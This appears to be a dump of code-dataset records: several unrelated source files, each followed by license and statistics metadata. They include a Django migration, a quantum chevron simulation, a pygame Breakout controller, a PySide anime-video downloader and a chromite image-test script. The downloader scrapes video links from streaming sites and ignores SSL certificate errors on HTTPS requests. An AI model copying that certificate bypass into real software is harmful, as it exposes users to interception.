'description_short': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'issues_addressed': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'larger_goal': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'length': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'liaison': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sfpirgapp.Liaison']", 'null': 'True', 'blank': 'True'}),
'logo': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'project_subject': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['sfpirgapp.ProjectSubject']", 'symmetrical': 'False'}),
'project_subject_other': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'project_type': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['sfpirgapp.ProjectType']", 'symmetrical': 'False'}),
'project_type_other': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'researcher_qualities': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'results_plan': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'size': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'support_method': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'time_per_week': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'sfpirgapp.projectsubject': {
'Meta': {'object_name': 'ProjectSubject'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
u'sfpirgapp.projecttype': {
'Meta': {'object_name': 'ProjectType'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
u'sfpirgapp.testimonial': {
'Meta': {'ordering': "('_order',)", 'object_name': 'Testimonial'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'testimonials'", 'to': u"orm['sfpirgapp.Category']"}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'featured_image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': u"orm['generic.AssignedKeyword']", 'frozen_by_south': 'True'}),
'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'theme_color': ('django.db.models.fields.CharField', [], {'default': "'grey'", 'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'testimonials'", 'to': u"orm['auth.User']"})
},
u'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['sfpirgapp']
|
bsd-2-clause
| -7,932,003,057,941,393,000
| 78.686709
| 187
| 0.562311
| false
| 3.590475
| false
| false
| false
|
QudevETH/PycQED_py3
|
pycqed/simulations/chevron_sim.py
|
1
|
2373
|
"""
Based on Olli's mathematica notebook used to simulate chevrons
"""
import numpy as np
from scipy.linalg import expm
ham = lambda e, g: np.array([[0.5*e, g], [g, -0.5*e]])
evol = lambda e, g, dt: expm(dt*1j*ham(e, g))
def rabisim(efun, g, t, dt):
"""
This function returns the evolution of a system described by the hamiltonian:
H = efun sigma_z + g sigma_x
Inputs:
efun, Function that returns the energy parameter vs time.s
g, Coupling parameter
t, Final time of the evolution
dt, Stepsize of the time evolution
Outputs:
f_vec, Evolution for times (1, 1+dt, ..., t)
"""
s0 = np.array([1, 0])
ts = np.arange(1., t+0.5*dt, dt)
f = lambda st, ti: np.dot(evol(efun(ti), g, dt), st)
f_vec = np.zeros((len(ts), 2), dtype=np.complex128)
f_vec[0, :] = s0
for i, t in enumerate(ts[:-1]):
f_vec[i+1, :] = f(f_vec[i], t)
return f_vec
qamp = lambda vec: np.abs(vec[:, 1])**2
def chevron(e0, emin, emax, n, g, t, dt, sf):
"""
Inputs:
e0, set energy scale at the center(detuning).
emin, sets min energy to simulate, in e0 units.
emax, sets max energy to simulate, in e0 units.
n, sets number of points in energy array.
g, Coupling parameter.
t, Final time of the evolution.
dt, Stepsize of the time evolution.
sf, Step function of the distortion kernel.
"""
energy_func = lambda energy, t: e0*(1.-(energy*sf(t))**2)
energy_vec = np.arange(1+emin, 1+emax, (emax-emin)/(n-1))
chevron_vec = []
for ee in energy_vec:
chevron_vec.append(
qamp(rabisim(lambda t: energy_func(ee, t), g, t, dt)))
return np.array(chevron_vec)
def chevron_slice(e0, energy, g, t, dt, sf):
"""
Inputs:
e0, set energy scale at the center(detuning).
energy, energy of the slice to simulate, in e0 units.
g, Coupling parameter.
t, Final time of the evolution.
dt, Stepsize of the time evolution.
sf, Step function of the distortion kernel.
"""
energy_func = lambda energy, t: e0*(1.-(energy*sf(t))**2)
return qamp(rabisim(lambda t: energy_func(energy, t), g, t, dt))
|
mit
| -6,412,169,818,103,500,000
| 33.897059
| 81
| 0.554994
| false
| 3.085826
| false
| false
| false
|
felipead/breakout
|
source/breakout/game/GameController.py
|
1
|
4147
|
from OpenGL.GL import *
from OpenGL.GLU import *
import pygame
from pygame.constants import *
from breakout.game.GameEngine import GameEngine
_FRAMES_PER_SECOND = 60
_MOUSE_VISIBLE = True
_CANVAS_WIDTH = 250
_CANVAS_HEIGHT = 300
_DEFAULT_SCREEN_WIDTH = 500
_DEFAULT_SCREEN_HEIGHT = 600
class GameController(object):
def __init__(self):
self.__engine = GameEngine(_CANVAS_WIDTH, _CANVAS_HEIGHT)
self.__screenWidth = _DEFAULT_SCREEN_WIDTH
self.__screenHeight = _DEFAULT_SCREEN_HEIGHT
def run(self):
self.__initialize()
self.__gameLoop()
def __initialize(self):
pygame.init()
pygame.mouse.set_visible(_MOUSE_VISIBLE)
pygame.display.set_mode((self.__screenWidth, self.__screenHeight), OPENGL | DOUBLEBUF)
glClearColor(0.0, 0.0, 0.0, 1.0)
glShadeModel(GL_FLAT)
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glBlendEquation(GL_FUNC_ADD)
self.__handleScreenResizeEvent(self.__screenWidth, self.__screenHeight)
self.__engine.initialize()
def __gameLoop(self):
clock = pygame.time.Clock()
ticks = 0
while True:
for event in pygame.event.get():
self.__handleInputEvent(event)
milliseconds = clock.tick(_FRAMES_PER_SECOND)
ticks += 1
self.__engine.update(milliseconds, ticks)
self.__engine.display(milliseconds, ticks, self.__screenWidth, self.__screenHeight, clock.get_fps())
pygame.display.flip() # swap buffers
def __handleInputEvent(self, event):
if event.type == QUIT:
exit()
elif event.type == VIDEORESIZE:
self.__handleScreenResizeEvent(event.w, event.h)
elif event.type == MOUSEMOTION:
self.__handleMouseMoveEvent(event.pos, event.rel, event.buttons)
elif event.type == MOUSEBUTTONUP:
self.__handleMouseButtonUpEvent(event.button, event.pos)
elif event.type == MOUSEBUTTONDOWN:
self.__handleMouseButtonDownEvent(event.button, event.pos)
elif event.type == KEYUP:
self.__handleKeyUpEvent(event.key, event.mod)
elif event.type == KEYDOWN:
self.__handleKeyDownEvent(event.key, event.mod, event.unicode)
def __handleScreenResizeEvent(self, width, height):
self.__screenWidth = width
self.__screenHeight = height
glViewport(0, 0, width, height)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluOrtho2D(self.__engine.canvas.left, self.__engine.canvas.right,
self.__engine.canvas.bottom, self.__engine.canvas.top)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
def __handleMouseButtonUpEvent(self, button, coordinates):
mappedCoordinates = self.__mapScreenCoordinatesToCanvas(coordinates)
self.__engine.handleMouseButtonUpEvent(button, mappedCoordinates)
def __handleMouseButtonDownEvent(self, button, coordinates):
mappedCoordinates = self.__mapScreenCoordinatesToCanvas(coordinates)
self.__engine.handleMouseButtonDownEvent(button, mappedCoordinates)
def __handleMouseMoveEvent(self, absolute_coordinates, relative_coordinates, buttons):
mapped_absolute_coordinates = self.__mapScreenCoordinatesToCanvas(absolute_coordinates)
self.__engine.handleMouseMoveEvent(mapped_absolute_coordinates, relative_coordinates, buttons)
def __handleKeyUpEvent(self, key, modifiers):
self.__engine.handleKeyUpEvent(key, modifiers)
def __handleKeyDownEvent(self, key, modifiers, char):
self.__engine.handleKeyDownEvent(key, modifiers, char)
def __mapScreenCoordinatesToCanvas(self, coordinates):
horizontalCanvasToScreenRatio = self.__engine.canvas.width / float(self.__screenWidth)
verticalCanvasToScreenRatio = self.__engine.canvas.height / float(self.__screenHeight)
(x, y) = coordinates
x *= horizontalCanvasToScreenRatio
y *= verticalCanvasToScreenRatio
y = self.__engine.canvas.top - y
return x, y
|
gpl-2.0
| 2,273,906,769,018,133,000
| 35.699115
| 112
| 0.661201
| false
| 3.938272
| false
| false
| false
|
pampi/pad
|
backend.py
|
1
|
26210
|
#Copyright (C) 2014 Adrian "APi" Pielech
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#any later version.
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
from PySide.QtNetwork import *
from PySide.QtCore import *
from PySide.QtGui import *
from subprocess import Popen, PIPE
class EPISODE(QListWidgetItem):
def __init__(self, parent=None, title='<Title>', value='<Value>'):
super(EPISODE, self).__init__(parent)
self.title = title
self.value = value
def setText(self, title):
self.title = title
super(EPISODE, self).setText(self.title)
def setValue(self, value):
self.value = value
def getValue(self):
return self.value
class DownloadEpisodeThread(QThread):
saveTo = None
who_am_i = 0
def __init__(self, parent, threadId):
super(DownloadEpisodeThread, self).__init__()
self.parentObject = parent
self.who_am_i = threadId
def run(self):
qNetMgr = QNetworkAccessManager()
downloadLoop = QEventLoop()
loopArg = True
item = None
p = self.parentObject
while(loopArg is True):
p.downloadMutex.tryLock(-1)
if(p.lstwToDownload.count() > 0):
item = p.lstwToDownload.takeItem(0)
p.appendLogs.emit('Zaczynam pobierać: ' + item.text())
else:
loopArg = False
item = None
if p.downloadedEps == p.mustDownloadEps:
p.btnDownload.setEnabled(True)
p.freezeSettings(True)
p.btnDownloadEpisodesList.setEnabled(True)
p.downloadMutex.unlock()
if not(item is None):
qReply = qNetMgr.get(QNetworkRequest(QUrl(item.getValue())))
if item.getValue().count('https://') > 0:
qReply.sslErrors.connect(qReply.ignoreSslErrors)
qReply.metaDataChanged.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute) == 302:
redirURL = qReply.attribute(QNetworkRequest.RedirectionTargetAttribute)
qReply = qNetMgr.get(QNetworkRequest(QUrl(redirURL)))
qReply.metaDataChanged.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute) == 200:
p.lblThreadArray[self.who_am_i].setText(item.text())
p.pbThreadArray[self.who_am_i].setEnabled(True)
self.saveTo = QFile(item.text())
if not self.saveTo.open(QIODevice.WriteOnly):
print('Nie moge otworzyc panie ;_;')
qReply.downloadProgress.connect(self.saveToFile)
qReply.finished.connect(downloadLoop.quit)
downloadLoop.exec_()
p.pbThreadArray[self.who_am_i].setEnabled(False)
self.saveTo.write(qReply.readAll())
self.saveTo.close()
p.downloadMutex.tryLock(-1)
p.downloadedEps = p.downloadedEps + 1
p.pbDownloaded.setValue(p.downloadedEps)
p.appendLogs.emit(item.text() + ' pobrano!')
if p.chkbConvert.isChecked() is True:
p.lstwToConvert.addItem(item)
p.sigConvert.emit()
p.downloadMutex.unlock()
else:
p.downloadMutex.tryLock(-1)
p.appendLogs.emit('Nie udało się pobrać ' + item.text() + '! Błąd: ' + str(qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute)) + '.')
p.downloadedEps = p.downloadedEps + 1
p.pbDownloaded.setValue(p.downloadedEps)
p.downloadMutex.unlock()
def saveToFile(self, received, total):
if total != self.parentObject.pbThreadArray[self.who_am_i].maximum():
self.parentObject.pbThreadArray[self.who_am_i].setMaximum(total)
self.parentObject.pbThreadArray[self.who_am_i].setValue(received)
class Backend:
def writeLog(self, log_message):
self.logDest.setPlainText(log_message + "\n" + self.logDest.toPlainText())
def convertEpisode(self):
self.convertMutex.tryLock(-1)
self.downloadMutex.tryLock(-1)
workItem = self.lstwToConvert.takeItem(0)
self.downloadMutex.unlock()
output_file = workItem.text()[:len(workItem.text()) - 3] + self.cbOutputFormat.currentText()
file_info = Popen(['ffmpeg', '-i', workItem.text()], stderr=PIPE)
file_info.wait()
file_info = file_info.stderr.read(-1).decode('utf-8')
file_info = file_info[file_info.find('Duration:') + 10:]
file_info = file_info[:file_info.find(',')]
file_time_info = file_info.split(':')
file_time_info = file_time_info + file_time_info[2].split('.')
length = int(file_time_info[0]) * 3600 + int(file_time_info[1]) * 60 + int(file_time_info[3])
self.pbConverted.setMaximum(length)
self.pbConverted.setValue(0)
self.appendLogs.emit('Zaczynam konwertować: ' + workItem.text())
'''TO DO Start converting'''
self.convertMutex.unlock()
def getEpisodesListFromWeb(self, linkToSeries, lblSeriesName, lstItems, log):
lstItems.clear()
self.logDest = log
if len(linkToSeries) > 15:
if linkToSeries.find('animeon.pl') >= 0:
lblSeriesName.setText(self.getAnimeOnList(linkToSeries, lstItems))
elif linkToSeries.find('anime-shinden.info') >= 0:
lblSeriesName.setText(self.getAShindenList(linkToSeries, lstItems))
else:
self.writeLog("Podano URL do nieobsługiwanego serwisu!")
else:
self.writeLog("Nieprawidłowy URL do serii!")
def getVideoListFromURL(self, get_from):
ret_val = [None]
basic_filename = get_from.text()
episode_page_url = get_from.getValue()
'''print(episode_page_url)'''
if episode_page_url.find('animeon.pl') > 0:
ret_val = self.extractLinksFromAnimeOn(episode_page_url, basic_filename)
elif (episode_page_url.find('anime-shinden.info') > 0) or (episode_page_url.find('shinden-anime.info') > 0):
episode_page_url = episode_page_url.replace('shinden-anime.info', 'anime-shinden.info')
ret_val = self.extractLinksFromAShinden(episode_page_url, basic_filename)
else:
self.writeLog('Coś poszło nie tak... Nie rozpoznano serwisu anime.\nCzy przypadkiem nie bawisz się w inżynierię odwrotną?')
return ret_val
def extractLinksFromAShinden(self, link, basename):
ret_val = [None]
self.writeLog('Pobieranie i parsowanie strony ' + basename + '...')
qNetMgr = QNetworkAccessManager()
qReply = qNetMgr.get(QNetworkRequest(QUrl(link)))
downloadLoop = QEventLoop()
qReply.finished.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.error() == 0:
if qReply.size() < 1024:
self.writeLog('Serwer zwrócił niepoprawną zawartość...')
self.writeLog(str(qReply.readAll().data()))
else:
done = 0
data = str(qReply.readAll().data())
data = data[data.find('video_tabs'):]
data = data[:data.find('<script')]
fb_count = int(data.count('http://anime-shinden.info/player/hd.php') / 2)
sibnet_count = data.count('video.sibnet.ru')
daily_count = data.count('www.dailymotion.com/embed/video')
if daily_count == 0:
daily_count = int(data.count('www.dailymotion.com/swf/video/') / 2)
data_backup = data
'''#jwplayer - fb'''
if fb_count > 0:
done = 1
fb_table = [None]
for i in range(0, fb_count):
data = data[data.find('http://anime-shinden.info/player/hd.php') + 10:]
data = data[data.find('http://anime-shinden.info/player/hd.php'):]
data = data[data.find('link=') + 5:]
vid = data[:data.find('.mp4')]
vid = 'https://www.facebook.com/video/embed?video_id=' + vid
link_to_face = self.getEmbedFacebookVideoLink(vid)
if len(link_to_face) > 0:
ep = EPISODE()
if fb_count == 1:
ep.setText(basename + ".mp4")
ep.setValue(link_to_face)
fb_table.append(ep)
else:
ep.setText(basename + chr(97 + i) + ".mp4")
ep.setValue(link_to_face)
fb_table.append(ep)
else:
self.writeLog('Nie udało się wydobyć linku do fejsa...')
done = 0
if done == 1:
ret_val = fb_table
if (done == 0) and (sibnet_count > 0):
data = data_backup
done = 1
sib_table = [None]
for i in range(0, sibnet_count):
data = data[data.find('http://video.sibnet.ru/'):]
data = data[data.find('=') + 1:]
vid = data[:data.find('''"''')]
link_to_sib = self.getEmbedSibnetRUVideoLink(vid)
if len(link_to_sib) > 0:
ep = EPISODE()
if sibnet_count > 0:
ep.setText(basename + ".mp4")
ep.setValue(link_to_sib)
sib_table.append(ep)
else:
ep.setText(basename + chr(97 + i) + ".mp4")
ep.setValue(link_to_sib)
fb_table.append(ep)
else:
self.writeLog('Nie udało się wydobyć linku do Sibnetu...')
done = 0
if done == 1:
ret_val = sib_table
print('Sibnet :D')
if (done == 0) and (daily_count > 0):
print('Daily lol')
data = data_backup
data = data.replace('http://www.dailymotion.com/swf/video/', 'http://www.dailymotion.com/embed/video/')
done = 1
daily_table = [None]
for i in range(0, daily_count):
data = data[data.find('http://www.dailymotion.com/embed/video/'):]
daily_temple_link = data[:data.find('''"''')]
data = data[data.find('''"'''):]
link_to_daily = self.getEmbedDailyVideoLink(daily_temple_link)
if len(link_to_daily) > 0:
ep = EPISODE()
if daily_count == 1:
ep.setText(basename + ".mp4")
ep.setValue(link_to_daily)
daily_table.append(ep)
else:
ep.setText(basename + chr(97 + i) + ".mp4")
ep.setValue(link_to_daily)
daily_table.append(ep)
else:
self.writeLog('Nie udało się wydobyć linku do DailyMotion...')
done = 0
if done == 1:
ret_val = daily_table
if done == 0:
self.writeLog('Wybacz, nie udało mi się znaleźć linku do żadnego działającego serwisu :(')
return ret_val
def extractLinksFromAnimeOn(self, link, basename):
ret_val = [None]
self.writeLog('Pobieranie i parsowanie strony ' + basename + '...')
qNetMgr = QNetworkAccessManager()
qReply = qNetMgr.get(QNetworkRequest(QUrl(link)))
downloadLoop = QEventLoop()
qReply.finished.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.error() == 0:
if qReply.size() < 1024:
self.writeLog('Serwer zwrócił niepoprawną zawartość...')
else:
data = str(qReply.readAll().data())
data = data[data.find('float-left player-container'):]
data = data[:data.find('float-left episode-nav')]
if data.count('<iframe src=') > 0:
counter = data.count('<iframe src=')
for i in range(0, data.count('<iframe src=')):
data = data[data.find('<iframe src='):]
data = data[data.find("""'""") + 1:]
the_link = data[:data.find("\\")]
data = data[data.find('</iframe>'):]
if the_link.find('facebook.com') > 0:
link_to_face = self.getEmbedFacebookVideoLink(the_link)
if len(link_to_face) > 0:
'''link_to_face = download'''
ep = EPISODE()
if counter == 1:
ep.setText(basename + ".mp4")
ep.setValue(link_to_face)
ret_val.append(ep)
else:
ep.setText(basename + chr(97 + i) + ".mp4")
ep.setValue(link_to_face)
ret_val.append(ep)
else:
self.writeLog('Nie udało się wydobyć linku do fejsa...')
elif the_link.find('vk.com') > 0:
link_to_vk = self.getEmbedVKVideoLink(the_link)
if len(link_to_vk) > 0:
ep = EPISODE()
if counter == 1:
ep.setText(basename + ".mp4")
ep.setValue(link_to_vk)
ret_val.append(ep)
else:
ep.setText(basename + chr(97 + i) + ".mp4")
ep.setValue(link_to_vk)
ret_val.append(ep)
else:
self.writeLog('Nie udało się wydobyć linku do VK...')
else:
self.writeLog('I dont know this player...')
elif data.count('<embed src=') > 0:
counter = data.count('<embed src=')
for i in range(0, data.count('<embed src=')):
data = data[data.find('<embed src='):]
data = data[data.find("""'""") + 1:]
the_link = data[:data.find("\\")]
data = data[data.find('</embed>'):]
if the_link.find('video.sibnet.ru') > 0:
the_link = the_link[the_link.find('=') + 1:]
link_to_sibnet = self.getEmbedSibnetRUVideoLink(the_link)
if len(link_to_sibnet) > 0:
ep = EPISODE()
if counter == 1:
ep.setText(basename + ".mp4")
ep.setValue(link_to_sibnet)
ret_val.append(ep)
else:
ep.setText(basename + chr(97 + i) + ".mp4")
ep.setValue(link_to_sibnet)
ret_val.append(ep)
else:
self.writeLog('Nie udało się wydobyć linku do Sibnetu...')
else:
self.writeLog('I dont know this player...')
elif data.count('jwplayer(') > 0:
counter = data.count('jwplayer(')
for i in range(0, counter):
data = data[data.find('jwplayer('):]
data = data[data.find('http://'):]
jw_link = data[:data.find("""'""") - 1]
qReply = qNetMgr.get(QNetworkRequest(QUrl(jw_link)))
qReply.metaDataChanged.connect(downloadLoop.quit)
downloadLoop.exec_()
if not ((qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute) == 200) or (qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute) == 302)):
jw_link = ''
if len(jw_link) > 0:
ep = EPISODE()
if counter == 1:
ep.setText(basename + ".mp4")
ep.setValue(jw_link)
ret_val.append(ep)
else:
ep.setText(basename + chr(97 + i) + ".mp4")
ep.setValue(jw_link)
ret_val.append(ep)
else:
self.writeLog('No player found.')
return ret_val
def getEmbedDailyVideoLink(self, url):
ret_val = ''
if url.count('/swf/') > 0:
url = url.replace('/swf/', '/embed/')
qNetMgr = QNetworkAccessManager()
qReply = qNetMgr.get(QNetworkRequest(QUrl(url)))
downloadLoop = QEventLoop()
qReply.finished.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.error() == 0:
print((qReply.size()))
data = qReply.readAll().data().decode('UTF-8')
if data.count('''"stream_h264_hd_url"''') > 0:
data = data[data.find('''"stream_h264_hd_url"'''):]
data = data[data.find('http:'):]
data = data[:data.find('''"''')]
data = data.replace("\\", '')
qReply = qNetMgr.get(QNetworkRequest(QUrl(data)))
qReply.metaDataChanged.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute) == 302:
'''302 Found'''
ret_val = data
return ret_val
def getEmbedSibnetRUVideoLink(self, vid):
ret_val = ''
url = 'http://video.sibnet.ru/shell_config_xml.php?videoid=' + vid + '&type=video.sibnet.ru'
qNetMgr = QNetworkAccessManager()
qReply = qNetMgr.get(QNetworkRequest(QUrl(url)))
downloadLoop = QEventLoop()
qReply.finished.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.error() == 0:
data = qReply.readAll().data().decode('UTF-8')
data = data[data.find('<file>') + 6:data.find('</file>')]
qReply = qNetMgr.get(QNetworkRequest(QUrl(data)))
qReply.metaDataChanged.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute) == 302:
'''302 Found'''
ret_val = data
return ret_val
def getEmbedVKVideoLink(self, url):
ret_val = ''
qNetMgr = QNetworkAccessManager()
qReply = qNetMgr.get(QNetworkRequest(QUrl(url)))
downloadLoop = QEventLoop()
qReply.finished.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.error() == 0:
data = qReply.readAll().data().decode('windows-1251')
data = data[data.find('url720=') + 7:]
data = data[:data.find('&')]
qReply = qNetMgr.get(QNetworkRequest(QUrl(data)))
qReply.metaDataChanged.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute) == 200:
'''200 OK'''
ret_val = data
return ret_val
def getEmbedFacebookVideoLink(self, url):
ret_val = ''
qNetMgr = QNetworkAccessManager()
qReply = qNetMgr.get(QNetworkRequest(QUrl(url)))
qReply.sslErrors.connect(qReply.ignoreSslErrors)
downloadLoop = QEventLoop()
qReply.finished.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.error() == 0:
data = qReply.readAll().data().decode('UTF-8')
if data.count('hd_src') > 0:
data = data[data.find('hd_src'):]
data = data[data.find('https'):]
data = data[:data.find('u002522') - 1]
data = data.replace("\\", "/")
data = data.replace("/u00255C", "").replace("/u00252F", "/").replace("/u00253F", "?").replace("/u00253D", "=").replace("/u002526", "&").replace("/u00253A",":")
qReply = qNetMgr.get(QNetworkRequest(QUrl(data)))
qReply.sslErrors.connect(qReply.ignoreSslErrors)
qReply.metaDataChanged.connect(downloadLoop.quit)
downloadLoop.exec_()
if qReply.attribute(QNetworkRequest.HttpStatusCodeAttribute) == 200:
'''200 OK'''
ret_val = data
return ret_val
def getAShindenList(self, url, items):
series_name = "-"
self.writeLog('Trwa pobieranie listy odcinków serii(A-Shinden)...')
qNetMgr = QNetworkAccessManager()
qReply = qNetMgr.get(QNetworkRequest(QUrl(url)))
loop = QEventLoop()
qReply.finished.connect(loop.quit)
loop.exec_()
if qReply.error() == 0:
if qReply.size() < 1024:
self.writeLog('Pobieranie danych o liście odcników nie powiodło się!')
else:
self.writeLog('Pobrano dane. Trwa parsowanie danych...')
data = str(qReply.readAll().data())
series_name = data[data.find('base fullstory'):]
series_name = series_name[:series_name.find('</a>')]
series_name = series_name[series_name.find('>', series_name.find('<a href=') + 7) + 1:]
series_name = series_name[:series_name.find('(') - 1]
self.writeLog('Pobierana seria: ' + series_name)
'''Extract episode list'''
'''Shrink data'''
data = data[data.find('daj online'):]
data = data[:data.find('</table>')]
data = data[data.find('<a href='):]
data = data[:data.find('</td>')]
i = data.find('<a href=')
while i >= 0:
ep = EPISODE()
ep.setValue(data[i + 9:data.find("\"", i + 9)])
data = data[data.find('>') + 1:]
ep.setText(data[:data.find('</a>')])
if data.find('<a href') >= 0:
data = data[data.find('<a href'):]
i = data.find('<a href')
if (ep.text().lower().find('odcinek') >= 0) or (ep.text().lower().find('ova') >= 0) or (ep.text().lower().find('odc') >= 0):
items.addItem(ep)
self.writeLog('Lista odcinków pobrana.')
else:
self.writeLog('Błąd połączenia. Pobieranie danych o liście odcników nie powiodło się!')
return series_name
def getAnimeOnList(self, url, items):
series_name = "-"
self.writeLog('Trwa pobieranie listy odcinków serii(AnimeOn)...')
qNetMgr = QNetworkAccessManager()
qReply = qNetMgr.get(QNetworkRequest(QUrl(url)))
loop = QEventLoop()
qReply.finished.connect(loop.quit)
loop.exec_()
if qReply.error() == 0:
if qReply.size() < 1024:
self.writeLog('Pobieranie danych o liście odcników nie powiodło się!')
else:
self.writeLog('Pobrano dane. Trwa parsowanie danych...')
data = str(qReply.readAll().data())
series_name = data[data.find('<title>') + 7: data.find(' Anime Online PL')]
data = data[data.find('episode-table') + 13:]
data = data[:data.find('</table')]
i = data.find('http://')
while i >= 0:
ep = EPISODE()
data = data[data.find('http://'):]
ep.setValue(data[:data.find('\\')])
ep.setText(data[data.find('odcinek'):data.find('</a>')])
items.addItem(ep)
data = data[data.find('</a>'):]
i = data.find('http://')
else:
self.writeLog('Błąd połączenia. Pobieranie danych o liście odcników nie powiodło się!')
return series_name
|
gpl-3.0
| -7,560,106,690,500,875,000
| 44.687063
| 175
| 0.488578
| false
| 3.980655
| false
| false
| false
|
endlessm/chromium-browser
|
third_party/chromite/scripts/test_image.py
|
1
|
4062
|
# -*- coding: utf-8 -*-
# Copyright 2014 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Script to mount a built image and run tests on it."""
from __future__ import print_function
import os
import sys
import unittest
from chromite.lib import constants
from chromite.lib import commandline
from chromite.lib import image_lib
from chromite.lib import image_test_lib
from chromite.lib import osutils
from chromite.lib import path_util
assert sys.version_info >= (3, 6), 'This module requires Python 3.6+'
def ParseArgs(args):
"""Return parsed commandline arguments."""
parser = commandline.ArgumentParser(description=__doc__)
parser.add_argument('--test_results_root', type='path',
help='Directory to store test results')
parser.add_argument('--board', type=str, help='Board (wolf, beaglebone...)')
parser.add_argument('image', type='path',
help='Image directory (or file) with mount_image.sh and '
'umount_image.sh')
parser.add_argument('-l', '--list', default=False, action='store_true',
